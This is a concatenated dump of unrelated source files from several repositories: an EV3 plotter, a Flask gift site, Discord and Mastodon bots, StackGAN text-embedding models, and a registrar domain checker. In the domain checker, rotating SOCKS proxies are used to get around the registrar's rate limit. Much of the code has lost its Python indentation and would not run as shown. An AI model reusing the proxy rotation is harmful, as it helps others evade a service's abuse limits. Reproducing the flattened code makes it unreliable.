yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# spacing
spacing()
print("R")
def printS():
# pen on paper
penToPaper()
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print("S")
def printT():
# pen on paper
penToPaper()
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print("T")
def printU():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("U")
def printV():
# pen on paper
penToPaper()
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#/
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("V")
def printW():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# /
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# \
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("W")
def printX():
# pen on paper
penToPaper()
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
    sleep(timeT / 1000)  # wait for the full-length diagonal stroke to finish
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("X")
def printY():
# pen on paper
penToPaper()
# \
printBackSlash()
# /
printFrontSlash()
#/
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("Y")
def printZ():
penToPaper()
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# /
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("Z")
def printBackSlash():
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
#/
def printFrontSlash():
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
def penToPaper():
print()
while(not touchSensor.is_pressed):
zMotor.run_timed(time_sp=timeT/4, speed_sp=speedBackwards)
sleep(timeT / 4000)
def penOutOfPaper():
print()
zMotor.run_timed(time_sp=3 * timeT, speed_sp=speed)
sleep(timeT / 333)
def spacing():
print("spacing")
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
def beginningOfThePage():
xMotor.run_timed(time_sp=timeT*14, speed_sp=speedBackwards)
sleep((timeT*14)/1000)
```
#### File: robotics/controller/message.py
```python
class Message:
def __init__(self, language, content):
self._language = language
self._content = content
def get_content(self):
return self._content
def get_language(self):
return self._language
``` |
{
"source": "1ntEgr8/christmas",
"score": 3
} |
#### File: 1ntEgr8/christmas/send_creator.py
```python
from send_email import send_email_creator, start_server, quit_server
import maketree
from surprise import db
from surprise.models import Creator, Recepient
def notify():
# need to go through the database
# check if the received part is True
# add functionality to bypass the truthiness of received
# collect all of the thank you notes in a dictionary
creators = Creator.query.all()
server = start_server()
count = 0
for creator in creators:
flag = True
posts_to_send = {}
recepients_for_creator = Recepient.query.filter_by(creator_id=creator.id)
for recepient in recepients_for_creator:
if recepient.received == False:
flag = False
break
if flag == True:
print("True")
for recepient in recepients_for_creator:
if recepient.thank_you_note:
posts_to_send[recepient.recepient_name] = recepient.thank_you_note
send_email_creator(server, creator.first_name, creator.email, posts_to_send)
count+=1
quit_server(server)
print("DONE NOTIFYING")
print(f"{count} people notified")
```
#### File: christmas/surprise/routes.py
```python
from flask import render_template, url_for, flash, redirect, request, session
from surprise.forms import RegistrationForm, AddRecepientForm
from surprise.models import Creator, Recepient
from surprise import app, db
from datetime import datetime
import hashlib
import time
# change the format of the recepient list
# get that logic done for today,
# then begin work on the reception part of the page
@app.route('/')
@app.route('/home')
def home():
return render_template('index.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/send', methods=['GET','POST'])
def send():
form = RegistrationForm()
if form.validate_on_submit():
        user = Creator(first_name=form.first_name.data.title().strip(),
                       last_name=form.last_name.data.title().strip(),
email=form.email.data,
request_time=datetime.utcnow())
db.session.add(user)
db.session.commit()
        session['first_name'] = form.first_name.data.title().strip()
        user = Creator.query.filter_by(first_name=form.first_name.data.title().strip(), email=form.email.data).first()
session['user-id'] = user.id
flash(f'Santa has got your details {form.first_name.data}! Enter your recepients now ...', 'success')
return redirect(url_for('add', name=session['first_name'], user_id=session['user-id']))
return render_template('send.html', form=form)
@app.route('/add', methods=['GET','POST'])
def add():
user = Creator.query.filter_by(id=session.get('user-id',0)).first()
creator_sender = Recepient.query.filter_by(id=session.get('recepient-id',0)).first()
if creator_sender:
creator_sender='Send one to ' + creator_sender.sender.first_name + '. Type in the name'
else:
creator_sender=''
if user and not user.sent:
if request.method == 'POST':
names = request.form
print(names)
print("I AM HERE")
count=1
for name in names:
print(names[name])
print("ADDING RECEPIENT")
date_posted=datetime.utcnow()
recepient = Recepient(recepient_name=names[name].title().strip(),
date_posted=date_posted,
creator_id=session['user-id'])
db.session.add(recepient)
db.session.commit()
recepient = Recepient.query.filter_by(date_posted=date_posted).first()
recepient.image_file='gift_generated/'+str(session['user-id'])+'_'+str(recepient.id)+'.jpg'
db.session.commit()
count+=1
user.sent=True
return redirect(url_for('link'))
else:
return redirect(url_for('home'))
return render_template('add.html', creator_sender=creator_sender)
@app.route('/link', methods=['GET','POST'])
def link():
first_name=session['first_name']
user_id=session['user-id']
flash(f'Santa has received your order!', 'success')
return render_template('link.html',first_name=first_name, user_id=user_id)
@app.route('/receive/<string:first_name>/<int:user_id>', methods=['GET','POST'])
def receive(first_name, user_id):
path = request.path
creator_id = path[path.rfind('/')+1:]
user = Creator.query.filter_by(id=creator_id).first()
#add some validators
name = user.first_name
print(request.method)
if request.method == 'POST':
entered_name = request.form['recepient_name'].title().strip()
recepient = Recepient.query.filter_by(recepient_name=entered_name, creator_id=creator_id).first()
if recepient:
if recepient.image_created:
session['recepient-id'] = recepient.id
return redirect(url_for('load', first_name=name, user_id=creator_id, recepient_name=entered_name, recepient_id=recepient.id))
else:
return redirect(url_for('noimage', first_name=name, user_id=creator_id, recepient_name=entered_name, recepient_id=recepient.id))
else:
return redirect(url_for('sad'))
return render_template('receive.html', first_name=name)
@app.route('/load/<string:first_name>/<int:user_id>/<string:recepient_name>/<int:recepient_id>', methods=['GET','POST'])
def load(first_name, user_id, recepient_name, recepient_id):
path = request.path
recepientid = path[path.rfind('/')+1:]
recepient = Recepient.query.filter_by(id=recepientid).first()
image_file = recepient.image_file
session['recepient-id'] = recepientid
return render_template('load.html', image_file=image_file)
@app.route('/noimage/<string:first_name>/<int:user_id>/<string:recepient_name>/<int:recepient_id>', methods=['GET','POST'])
def noimage(first_name, user_id, recepient_name, recepient_id):
path = request.path
recepient_id = path[path.rfind('/')+1:]
if request.method == 'POST':
email = request.form['email']
recepient = Recepient.query.filter_by(id=recepient_id).first()
recepient.recepient_email=email
db.session.commit()
return redirect(url_for('promo'))
return render_template('noimage.html')
@app.route('/redirect')
def promo():
return render_template('promo.html')
@app.route('/thanks', methods=['GET','POST'])
def thanks():
if request.method == 'POST':
recepient = Recepient.query.filter_by(id=session['recepient-id']).first()
recepient.received = True
recepient.thank_you_note = request.form['thanks']
if request.form.get('like','') == 'ok':
recepient.liked = True
db.session.commit()
return render_template('thanks.html')
@app.route('/sad')
def sad():
return render_template('sad.html')
# @app.route('/donate', methods=['GET','POST'])
# def donate():
# return render_template('donate.html')
``` |
{
"source": "1ntegrale9/Echidna",
"score": 2
} |
#### File: Echidna/echidna/utils.py
```python
from numpy import base_repr
def base36(num):
return base_repr(num, 36)
``` |
{
"source": "1ntegrale9/squidgirl",
"score": 2
} |
#### File: discordbot/cogs/general.py
```python
from discord.ext import commands
from datetime import datetime
import traceback
def anyin(list, elements):
return any(e in list for e in elements)
class General(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
await self.bot.get_channel(self.bot.id_channel_system).send(str(datetime.now()))
async def perse(self, message):
if message.guild.id != self.bot.id_guild_splatoon:
return
if str(self.bot.user.id) not in message.content:
return
if anyin(message.content, ['ふとん', '布団']):
return await self.sleep(self.bot, message)
if anyin(message.content, ['黒歴史']):
logs = [log async for log in message.channel.history() if log.author == message.author]
await message.channel.delete_messages(logs)
return await message.channel.send(f'{message.author.mention} は何も言ってない、いいね?')
if anyin(message.content, ['バルス']):
logs = [log async for log in message.channel.history() if log.author.bot]
await message.channel.delete_messages(logs)
return await message.channel.send(f'{message.author.mention} botなんていなかった!')
async def sleep(self, message):
afk = message.guild.afk_channel
vc = message.author.voice.channel
if not afk:
return await message.channel.send(f'{message.author.mention} おふとんはどこ?')
if not vc:
return await message.channel.send(f'{message.author.mention} ボイスチャンネルに入ってね!')
for member in vc.members:
await member.move_to(afk)
await message.channel.send('おやすみなさい!')
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.author.bot:
return
if not message.content:
return
if message.guild.id != self.bot.id_guild_splatoon:
return
await self.perse(message)
except Exception as e:
await message.channel.send(str(e) + '\nっていうエラーが出たよ')
await self.bot.get_channel(self.bot.id_channel_system).send(
f'```\n{traceback.format_exc()}\n```'
)
def setup(bot):
bot.add_cog(General(bot))
```
#### File: mastodonbot/fedibird/count.py
```python
import os
from mastodon import Mastodon
from argparse import ArgumentParser
def fedibird():
return Mastodon(
access_token=os.getenv('MASTODON_TOKEN'),
api_base_url='https://fedibird.com',
)
def count(time):
client = fedibird()
statuses = sorted(
client.account_statuses(77150),
key=lambda status: status['created_at'],
reverse=True,
)
status = [status for status in statuses if status['poll'] is not None][0]
status_poll = status['poll']
votes = [poll['votes_count'] for poll in status_poll['options'] if poll['title'] == f'{time}時から参加可能'][0]
client.status_post(
status=f'{time}時から{votes}人が参加できるらしいよ! #今日のプラベ',
in_reply_to_id=status,
)
parser = ArgumentParser()
parser.add_argument('time', type=int)
args = parser.parse_args()
count(args.time)
``` |
{
"source": "1o0ko/StackGAN-v2",
"score": 3
} |
#### File: embedding_models/bilstm/model.py
```python
import torch.nn as nn
from embedding_models.configurable import Configurable
class BiLSTMEncoder(nn.Module, Configurable):
def __init__(self, n_src_vocab, d_word_vec=512, d_model=512, embedding_size=1024, dropout=0.0):
super(BiLSTMEncoder, self).__init__()
self.d_word_vec = d_word_vec
self.emb = nn.Embedding(n_src_vocab, d_word_vec, padding_idx=2)
self.bilstm = nn.LSTM(d_word_vec, d_model, batch_first=True, bidirectional=True)
self.encoding = nn.Linear(d_model * 2, embedding_size)
# initialize weights
self.init_weights()
def get_trainable_parameters(self):
return filter(lambda p: p.requires_grad, self.parameters())
def init_weights(self, initrange=0.1):
self.emb.weight.data.uniform_(-initrange, initrange)
for name, param in self.bilstm.named_parameters():
if 'bias' in name:
nn.init.constant(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal(param)
def forward(self, x):
embeddings = self.emb(x)
# take the output features (h_t) from the last layer of the BiLSTM for each t
output, hiddens = self.bilstm(embeddings)
encoding = self.encoding(output[:, -1, :])
return encoding
@classmethod
def get_arguments_from_configs(self, exp_cfg, model_cfg):
kwargs = {}
kwargs.update(model_cfg)
return kwargs
class BiLSTMClassifier(nn.Module):
def __init__(self, n_classes,
n_src_vocab, d_word_vec=512, d_model=512, embedding_size=1024, dropout=0.0):
''' Softmax classiffier on top of BiLSTM Encoder '''
super(BiLSTMClassifier, self).__init__()
self.encoder = BiLSTMEncoder(n_src_vocab, d_word_vec, d_model, embedding_size, dropout)
self.projection = nn.Linear(embedding_size, n_classes)
self.init_weights()
def forward(self, x):
encoding = self.encoder(x)
y = self.projection(encoding)
log_probs = nn.functional.log_softmax(y, dim=1)
return log_probs
def init_weights(self):
nn.init.constant(self.projection.bias, 0.0)
nn.init.xavier_normal(self.projection.weight)
@classmethod
def from_configs(self, exp_cfg, model_cfg):
return BiLSTMClassifier(**BiLSTMEncoder.get_arguments_from_configs(exp_cfg, model_cfg))
```
#### File: code/embedding_models/decepticon.py
```python
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from configurable import Configurable
from transformer.Models import Encoder
class Decepticon(nn.Module, Configurable):
''' An encoder with attention mechanism. '''
def __init__(
self, n_src_vocab, n_max_seq, n_layers=2, n_head=2,
d_word_vec=100, d_model=100, d_inner_hid=100, d_k=100, d_v=100,
dropout=0.1, proj_share_weight=True):
super(Decepticon, self).__init__()
self.encoder = Encoder(
n_src_vocab, n_max_seq, n_layers=n_layers, n_head=n_head,
d_word_vec=d_word_vec, d_model=d_model,
d_inner_hid=d_inner_hid, dropout=dropout)
assert d_model == d_word_vec, 'To facilitate the residual connections' \
'the dimensions of all module output shall be the same.'
def get_trainable_parameters(self):
''' Avoid updating the position encoding '''
enc_freezed_param_ids = set(map(id, self.encoder.position_enc.parameters()))
freezed_param_ids = enc_freezed_param_ids
return (p for p in self.parameters() if id(p) not in freezed_param_ids)
def get_sent_embedding(self, src_seq):
src_pos = Variable(
torch.arange(0, src_seq.size(1)).repeat(src_seq.size(0), 1).type(torch.LongTensor).cuda())
enc_output = self.encoder(src_seq, src_pos)
sent_embedding = enc_output.view(enc_output.size(0), -1)
return sent_embedding
def forward(self, src_seq):
src_pos = Variable(
torch.arange(0, src_seq.size(1)).repeat(src_seq.size(0), 1).type(torch.LongTensor).cuda())
enc_output = self.encoder(src_seq, src_pos)
sent_embedding = enc_output.view(enc_output.size(0), -1)
return sent_embedding
@classmethod
def get_arguments_from_configs(cls, experiment_cfg, model_cfg):
kwargs = {'n_max_seq': experiment_cfg.TEXT.MAX_LEN}
kwargs.update(model_cfg)
return kwargs
if __name__ == '__main__':
test_module = Decepticon(10, 7)
test_module.cuda()
seq = np.asarray([[0, 1, 4, 5, 6, 1, 2]])
seq = Variable(torch.from_numpy(seq).cuda())
out = test_module(seq)
print(out.size())
```
#### File: embedding_models/transformer/Translator.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
from Models import Transformer
from Beam import Beam
class Translator(object):
''' Load with trained model and handle the beam search '''
def __init__(self, opt):
self.opt = opt
self.tt = torch.cuda if opt.cuda else torch
checkpoint = torch.load(opt.model)
model_opt = checkpoint['settings']
self.model_opt = model_opt
model = Transformer(
model_opt.src_vocab_size,
model_opt.tgt_vocab_size,
model_opt.max_token_seq_len,
proj_share_weight=model_opt.proj_share_weight,
embs_share_weight=model_opt.embs_share_weight,
d_k=model_opt.d_k,
d_v=model_opt.d_v,
d_model=model_opt.d_model,
d_word_vec=model_opt.d_word_vec,
d_inner_hid=model_opt.d_inner_hid,
n_layers=model_opt.n_layers,
n_head=model_opt.n_head,
dropout=model_opt.dropout)
prob_projection = nn.LogSoftmax()
model.load_state_dict(checkpoint['model'])
print('[Info] Trained model state loaded.')
if opt.cuda:
model.cuda()
prob_projection.cuda()
else:
model.cpu()
prob_projection.cpu()
model.prob_projection = prob_projection
self.model = model
self.model.eval()
def translate_batch(self, src_batch):
''' Translation work in one batch '''
# Batch size is in different location depending on data.
src_seq, src_pos = src_batch
batch_size = src_seq.size(0)
beam_size = self.opt.beam_size
#- Enocde
enc_output, = self.model.encoder(src_seq, src_pos)
#--- Repeat data for beam
src_seq = Variable(
src_seq.data.repeat(1, beam_size).view(
src_seq.size(0) * beam_size, src_seq.size(1)))
enc_output = Variable(
enc_output.data.repeat(1, beam_size, 1).view(
enc_output.size(0) * beam_size, enc_output.size(1), enc_output.size(2)))
#--- Prepare beams
beams = [Beam(beam_size, self.opt.cuda) for _ in range(batch_size)]
beam_inst_idx_map = {
beam_idx: inst_idx for inst_idx, beam_idx in enumerate(range(batch_size))}
n_remaining_sents = batch_size
#- Decode
for i in range(self.model_opt.max_token_seq_len):
len_dec_seq = i + 1
# -- Preparing decoded data seq -- #
# size: batch x beam x seq
dec_partial_seq = torch.stack([
b.get_current_state() for b in beams if not b.done])
# size: (batch * beam) x seq
dec_partial_seq = dec_partial_seq.view(-1, len_dec_seq)
# wrap into a Variable
dec_partial_seq = Variable(dec_partial_seq, volatile=True)
# -- Preparing decoded pos seq -- #
# size: 1 x seq
dec_partial_pos = torch.arange(1, len_dec_seq + 1).unsqueeze(0)
# size: (batch * beam) x seq
dec_partial_pos = dec_partial_pos.repeat(n_remaining_sents * beam_size, 1)
# wrap into a Variable
dec_partial_pos = Variable(dec_partial_pos.type(torch.LongTensor), volatile=True)
if self.opt.cuda:
dec_partial_seq = dec_partial_seq.cuda()
dec_partial_pos = dec_partial_pos.cuda()
# -- Decoding -- #
dec_output = self.model.decoder(
dec_partial_seq, dec_partial_pos, src_seq, enc_output)
dec_output = dec_output[:, -1, :] # (batch * beam) * d_model
dec_output = self.model.tgt_word_proj(dec_output)
out = self.model.prob_projection(dec_output)
# batch x beam x n_words
word_lk = out.view(n_remaining_sents, beam_size, -1).contiguous()
active_beam_idx_list = []
for beam_idx in range(batch_size):
if beams[beam_idx].done:
continue
inst_idx = beam_inst_idx_map[beam_idx]
if not beams[beam_idx].advance(word_lk.data[inst_idx]):
active_beam_idx_list += [beam_idx]
if not active_beam_idx_list:
# all instances have finished their path to <EOS>
break
# in this section, the sentences that are still active are
# compacted so that the decoder is not run on completed sentences
active_inst_idxs = self.tt.LongTensor(
[beam_inst_idx_map[k] for k in active_beam_idx_list])
# update the idx mapping
beam_inst_idx_map = {
beam_idx: inst_idx for inst_idx, beam_idx in enumerate(active_beam_idx_list)}
def update_active_seq(seq_var, active_inst_idxs):
''' Remove the src sequence of finished instances in one batch. '''
                inst_idx_dim_size, *rest_dim_sizes = seq_var.size()
                inst_idx_dim_size = inst_idx_dim_size * len(active_inst_idxs) // n_remaining_sents
                new_size = (inst_idx_dim_size, *rest_dim_sizes)
# select the active instances in batch
original_seq_data = seq_var.data.view(n_remaining_sents, -1)
active_seq_data = original_seq_data.index_select(0, active_inst_idxs)
active_seq_data = active_seq_data.view(*new_size)
return Variable(active_seq_data, volatile=True)
def update_active_enc_info(enc_info_var, active_inst_idxs):
''' Remove the encoder outputs of finished instances in one batch. '''
                inst_idx_dim_size, *rest_dim_sizes = enc_info_var.size()
                inst_idx_dim_size = inst_idx_dim_size * len(active_inst_idxs) // n_remaining_sents
                new_size = (inst_idx_dim_size, *rest_dim_sizes)
# select the active instances in batch
original_enc_info_data = enc_info_var.data.view(
n_remaining_sents, -1, self.model_opt.d_model)
active_enc_info_data = original_enc_info_data.index_select(0, active_inst_idxs)
active_enc_info_data = active_enc_info_data.view(*new_size)
return Variable(active_enc_info_data, volatile=True)
src_seq = update_active_seq(src_seq, active_inst_idxs)
enc_output = update_active_enc_info(enc_output, active_inst_idxs)
#- update the remaining size
n_remaining_sents = len(active_inst_idxs)
#- Return useful information
all_hyp, all_scores = [], []
n_best = self.opt.n_best
for beam_idx in range(batch_size):
scores, tail_idxs = beams[beam_idx].sort_scores()
all_scores += [scores[:n_best]]
hyps = [beams[beam_idx].get_hypothesis(i) for i in tail_idxs[:n_best]]
all_hyp += [hyps]
return all_hyp, all_scores
```
#### File: code/miscc/utils.py
```python
import re
import errno
import numpy as np
import scipy.misc
import os
from scipy.misc import imresize
from PIL import Image, ImageDraw, ImageFont
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
def drawCaption(img, caption, max_len):
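    # Draw the per-stage labels (Stage-I/II/III) at fixed rows and the caption split
    # across two lines of at most max_len words; note the hard-coded TrueType font
    # path below is specific to the original training environment.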
img_txt = Image.fromarray(img)
# get a font
fnt = ImageFont.truetype('/eai/project/.fonts/FreeMono.ttf', 30)
# get a drawing context
d = ImageDraw.Draw(img_txt)
d.text((10, 256), 'Stage-I', font=fnt, fill=(0, 0, 0, 255))
d.text((10, 512), 'Stage-II', font=fnt, fill=(0, 0, 0, 255))
d.text((10, 768), 'Stage-III', font=fnt, fill=(0, 0, 0, 255))
caption = caption.split(' ')
cap1 = ' '.join(caption[:max_len])
cap2 = ' '.join(caption[max_len + 1:])
d.text((256, 10), cap1, font=fnt, fill=(0, 0, 0, 255))
d.text((256, 60), cap2, font=fnt, fill=(127, 127, 127, 255))
return img_txt
def save_images_with_text(
lr_sample_batchs, hr_sample_batchs, sr_sample_batchs,
reals_batch, texts_batch, batch_size, max_len,
startID, save_dir=None):
if save_dir and not os.path.isdir(save_dir):
print('Make a new folder: ', save_dir)
mkdir_p(save_dir)
# Save up to 16 samples for each text embedding/sentence
img_shape = sr_sample_batchs[0][0].shape
super_images = []
for i in range(batch_size):
if not re.search('[a-zA-Z]+', texts_batch[i]):
continue
padding = 255 + np.zeros(img_shape)
row1 = [padding]
row2 = [padding]
row3 = [padding]
for j in range(lr_sample_batchs[0].shape[0]):
lr_img = lr_sample_batchs[i][j]
hr_img = hr_sample_batchs[i][j]
sr_img = sr_sample_batchs[i][j]
if j == 0:
row1.append(imresize(reals_batch[0][i], sr_img.shape[:2]))
row2.append(imresize(reals_batch[1][i], sr_img.shape[:2]))
row3.append(imresize(reals_batch[2][i], sr_img.shape[:2]))
lr_re_sample = imresize(lr_img, sr_img.shape[:2])
hr_re_sample = imresize(hr_img, sr_img.shape[:2])
row1.append(lr_re_sample)
row2.append(hr_re_sample)
row3.append(sr_img)
row1 = np.concatenate(row1, axis=1)
row2 = np.concatenate(row2, axis=1)
row3 = np.concatenate(row3, axis=1)
superimage = np.concatenate([row1, row2, row3], axis=0)
top_padding = 255 + np.zeros((128, superimage.shape[1], 3))
superimage = np.concatenate([top_padding, superimage], axis=0)
fullpath = '%s/sentence_%04d.jpg' % (save_dir, startID + i)
superimage = drawCaption(np.uint8(superimage), texts_batch[i], max_len)
if save_dir:
scipy.misc.imsave(fullpath, superimage)
super_images.append(superimage)
return super_images
``` |
{
"source": "1ocalhost/py_cheat",
"score": 2
} |
#### File: 1ocalhost/py_cheat/bulk_domain_checker_su.py
```python
import os
import asyncio
import aiohttp
import logging
from itertools import cycle
from aiohttp_socks import ProxyConnector
logger = None
def fmt_exc(exc):
return f'{type(exc).__name__}: "{exc}"'
def num2str_base(num, base_symbols, width=None):
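    # Convert a non-negative integer to a string in an arbitrary symbol base,
    # left-padding with the zero symbol up to `width`; e.g. with the 26 lowercase
    # letters as symbols, num2str_base(10, symbols, width=3) -> 'aak'.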
base = len(base_symbols)
assert base > 1
def encode(n):
return str(base_symbols[n])
def impl(num):
if num < base:
return encode(num)
else:
return impl(num // base) + encode(num % base)
result = impl(num)
if isinstance(width, int):
fill_width = width - len(result)
if fill_width > 0:
return base_symbols[0] * fill_width + result
return result
def str2num_base(num_str, base_symbols):
base = len(base_symbols)
symbol2num = {}
for i in range(base):
symbol2num[base_symbols[i]] = i
result = 0
tokens = list(reversed(num_str))
for i in range(len(tokens)):
result += symbol2num[tokens[i]] * (base ** i)
return result
class TaskAllocator:
BASE_SYMBOLS = [chr(ord('a') + i) for i in range(26)]
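    # Treat candidate domain labels as base-26 numbers so the whole range
    # name_begin..name_end (e.g. 'aaa'..'zzz') can be handed out in numeric batches.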
def __init__(self, name_begin, name_end):
assert len(name_begin) == len(name_end)
self.domain_width = len(name_begin)
self.task_begin = self.str2num(name_begin)
self.task_end = self.str2num(name_end)
def str2num(self, num_str):
return str2num_base(num_str, self.BASE_SYMBOLS)
def num2str(self, num):
return num2str_base(num, self.BASE_SYMBOLS, self.domain_width)
def get(self, max_task_num=1):
logger.info(f'TaskAllocator: [{self.task_begin}/{self.task_end}]')
assert 1 <= max_task_num <= 100
tasks = []
for i in range(max_task_num):
if self.task_begin > self.task_end:
break
tasks.append(self.task_begin)
self.task_begin += 1
return [self.num2str(t) for t in tasks]
class ProxyAllocator:
def __init__(self):
self.proxies = []
self.read_by_lines('socks5', 'socks5.txt')
self.read_by_lines('socks4', 'socks4.txt')
self.proxies_itor = cycle(self.proxies)
def read_by_lines(self, type_, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
line = line.strip()
if not line:
continue
self.proxies.append((type_, line))
def get(self):
type_, server_port = next(self.proxies_itor)
proxy = f'{type_}://{server_port}'
logger.info(f'ProxyAllocator: {proxy}')
return proxy
class Checker:
def __init__(self, bus):
self.bus = bus
self.proxy = None
self.first_call_api = True
@staticmethod
def build_payload(names):
return {
'ru': 0,
'is_bulk_registration': 0,
'bulk_procedure': 1,
'istransfer': 0,
'domains': ' '.join(names),
'fake_responses': 0,
}
async def call_api(self, names):
if self.first_call_api:
self.first_call_api = False
else:
await asyncio.sleep(1)
if not self.proxy:
self.proxy = self.bus.proxy_allocator.get()
connector = ProxyConnector.from_url(self.proxy)
timeout = aiohttp.ClientTimeout(total=10)
url = 'https://www.reg.com/domain/new/check_queue'
payload = self.build_payload(names)
try:
async with aiohttp.ClientSession(
connector=connector, timeout=timeout) as session:
async with session.post(url, data=payload) as resp:
return resp.status, (await resp.json())
except Exception as e:
logger.warning(f'call_api: {fmt_exc(e)}')
self.proxy = None
return None, {}
async def run(self):
assigner = self.bus.task_allocator
while True:
tasks = [x + '.su' for x in assigner.get(3)]
if not tasks:
break
while tasks:
code, result = await self.call_api(tasks)
if code is None:
continue
if code != 200:
logger.warning(f'code {code} with {tasks}')
self.proxy = None
continue
domains = result.get('domains')
if domains is None: # {'error': 'LIMIT_EXCEEDED'}
logger.error(f'result: {result}')
self.proxy = None
continue
for item in result['domains']:
domain = item['domain']
tasks.remove(domain)
logger.info(f'{domain} => {item["error_code"]}')
if item['avail']:
self.bus.add_available(domain)
class CheckerBus:
def __init__(self):
self.task_allocator = TaskAllocator('aaa', 'zzz')
self.proxy_allocator = ProxyAllocator()
self.available_domains = open('available_domains.txt', 'a')
def add_available(self, domain):
self.available_domains.write(domain + '\n')
self.available_domains.flush()
def bulk_checker_loop(self, worker_num):
assert 1 <= worker_num <= 200
async def checker():
await Checker(self).run()
workers = [checker() for i in range(worker_num)]
future = asyncio.gather(*workers)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
def start(self):
try:
self.bulk_checker_loop(100)
finally:
self.available_domains.close()
def main():
FORMAT = '[%(asctime)s] [%(levelname)s] %(message)s'
logging.basicConfig(format=FORMAT)
logger_ = logging.getLogger(__name__)
logger_.setLevel(logging.DEBUG)
global logger
logger = logger_
if os.name == 'nt':
